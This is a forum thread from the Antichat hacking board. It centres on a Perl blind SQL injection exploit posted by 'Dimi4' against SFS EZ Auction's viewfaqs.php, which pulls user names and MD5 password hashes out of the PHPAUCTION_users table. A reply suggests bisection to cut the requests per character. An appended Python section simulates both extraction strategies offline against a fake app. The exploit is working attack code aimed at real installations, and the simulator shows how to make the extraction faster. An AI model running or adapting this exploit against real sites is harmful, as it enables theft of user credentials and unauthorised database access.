ANTICHAT Forum

ANTICHAT Forum (https://forum.antichat.xyz/index.php)
-   Scripts/CMF/CMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   SFS Auction Blind sql injection Exploit (https://forum.antichat.xyz/showthread.php?t=118476)

Dimi4 30.04.2009 14:30

SFS Auction Blind sql injection Exploit
 
Attachments: 1
SFS Auction Blind sql injection Exploit

Code:

#!/usr/bin/perl -w

use strict;
use LWP::Simple;

$| = 1;

print q {

:::::::::::::::::::::::::::::::::::::::::::::::::::
:: SFS EZ Auction  Blind sql injection  exploit  ::
::                written by Dimi4              ::
:::::::::::::::::::::::::::::::::::::::::::::::::::

[~] Greetz:
[~] UASC uasc.org.ua
[~] ANTICHAT forum.antichat.ru

};

if (@ARGV < 1) {
 print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
 exit;
}

my $page = shift;

# Symbols a "name:md5hash" value can contain; each of them may cost one request per position.
my @charset = ('a'..'z', 'A'..'Z', '0'..'9', ':');

my $url      = "http://".$page."/viewfaqs.php?cat=1+and+1=1+and+";
my $subquery = "(SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users)";

print "[x] Vulnerability check...\n";

# With a false condition the query returns no rows and the unpatched script
# trips a mysql_result() warning that shows up in the page body.
my $chreq = get("http://".$page."/viewfaqs.php?cat=1+and+1=0") || '';

if (($chreq =~ m/Warning/i) || ($chreq =~ m/mysql_result/i)) {

print "[x] Seems to be vulnerable!\n";

} else {

print "[o] Seems to be patched, sorry\n";
exit;

}


print "[+] Getting hash...\n";
print "[+] Hash: ";

my $curnum = 1;

# name + ':' + 32 hex digits; also stop as soon as no symbol matches, which
# means the end of the string (or a character outside @charset) was reached.
while ($curnum < 62) {

 # Baseline page for a condition that is always false; a page of a different
 # length means the injected condition was true.
 my $false_result = get($url."ascii(substring(version(),".$curnum.",1))=-1") || '';

 my $found = 0;

 foreach my $char (@charset) {

  my $ascode = ord($char);
  my $result = get($url."ascii(substring(".$subquery.",".$curnum.",1))=".$ascode) || '';

  if (length($result) != 0 && length($result) != length($false_result)) {
   print $char;
   $found = 1;
   last;
  }
 }

 last unless $found;
 $curnum++;
}

print "\n[+] Done!\n";


Qwazar 30.04.2009 14:45

Dimi4, sending 63 requests per character is not cool. Especially when you can get by with 6 requests in the worst case.
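The two posts above describe the two ways of reading a string through a boolean blind injection: Dimi4's script tries every one of its 63 symbols with `=` until one matches, while Qwazar's remark refers to bisecting the sorted symbol set with `>` comparisons, which needs at most ceil(log2(63)) = 6 requests per position. The following is an added example, not code from the thread or from SFS EZ Auction: it runs both strategies offline against a small simulator of `viewfaqs.php?cat=1+and+<cond>` (an assumption, not the real PHP) and counts the requests each one makes. `SECRET` is a constructed "name:md5" row, `FakeAuctionApp` and its warning text are stand-ins, and the oracle is built exactly as the script builds it, by comparing page lengths against a known-false baseline.

```python
import re

# Constructed sample row (not from any real site): the name "admin" and the md5
# of "password", joined with ':' the way the posted subquery does via concat_ws(0x3a,...).
SECRET = "admin:5f4dcc3b5aa765d61d8327deb882cf99"

# The 63 symbols the posted script tries, sorted by code point so they can be bisected.
CHARSET = sorted("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789:")

SUBQUERY = "(SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users)"


class FakeAuctionApp:
    """Offline stand-in (an assumption) for viewfaqs.php?cat=1+and+<cond>: evaluates the
    injected boolean against SECRET and renders either a FAQ row or a mysql_result()
    warning, which is the difference the posted script keys on. Counts requests."""

    def __init__(self, secret):
        self.secret = secret
        self.requests = 0

    def get(self, cond):
        self.requests += 1
        if self._evaluate(cond):
            return "<tr><td>FAQ #1</td></tr>"
        return "Warning: mysql_result(): Unable to jump to row 0 on MySQL result index"

    def _evaluate(self, cond):
        # ascii(substring(<subquery>,POS,1)) OP N ; MySQL gives ascii('') == 0 past the end
        m = re.fullmatch(r"ascii\(substring\(.*,(\d+),1\)\)([<>=])(\d+)", cond)
        if m:
            pos, op, n = int(m.group(1)), m.group(2), int(m.group(3))
            ch = self.secret[pos - 1:pos]
            return _compare(ord(ch) if ch else 0, op, n)
        # length(<subquery>) OP N
        m = re.fullmatch(r"length\(.*\)([<>=])(\d+)", cond)
        if m:
            return _compare(len(self.secret), m.group(1), int(m.group(2)))
        return cond == "1=1"


def _compare(lhs, op, rhs):
    return {"<": lhs < rhs, ">": lhs > rhs, "=": lhs == rhs}[op]


def make_oracle(app):
    """Boolean oracle built the way the posted script does it: fetch the page for an
    always-false condition, then treat any page of a different length as 'true'."""
    false_len = len(app.get("1=0"))
    return lambda cond: len(app.get(cond)) != false_len


def bisect_length(oracle, max_len=256):
    """Find the target string's length with '>' comparisons (at most 9 requests here)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length({SUBQUERY})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def linear_extract(oracle, length):
    """Dimi4's strategy: per position, try every symbol with '=' until one hits (up to 63)."""
    out = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if oracle(f"ascii(substring({SUBQUERY},{pos},1))={ord(ch)}"):
                out += ch
                break
    return out


def bisect_extract(oracle, length):
    """Qwazar's point: bisect the sorted charset with '>' comparisons, at most 6 per position.
    Assumes every character is in CHARSET; a symbol outside it yields a wrong neighbour."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, len(CHARSET) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"ascii(substring({SUBQUERY},{pos},1))>{ord(CHARSET[mid])}"):
                lo = mid + 1
            else:
                hi = mid
        out += CHARSET[lo]
    return out


def compare(secret=SECRET):
    """Run both strategies on fresh simulators; return {name: (recovered, requests)} where
    requests counts only the per-character extraction, not the baseline or length probes."""
    results = {}
    for name, strategy in (("linear", linear_extract), ("bisect", bisect_extract)):
        app = FakeAuctionApp(secret)
        oracle = make_oracle(app)
        length = bisect_length(oracle)
        before = app.requests
        results[name] = (strategy(oracle, length), app.requests - before)
    return results


if __name__ == "__main__":
    for name, (recovered, n) in compare().items():
        print(f"{name:7s} {n:4d} requests -> {recovered}")
```

Bisecting the charset only works when every character of the target is in it; bisecting the full byte range 0..255 instead costs 8 requests per position but recovers any byte, and one extra `=` query per position confirms the result either way. Probing the length first also removes the script's dependence on a fixed 62-iteration loop.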

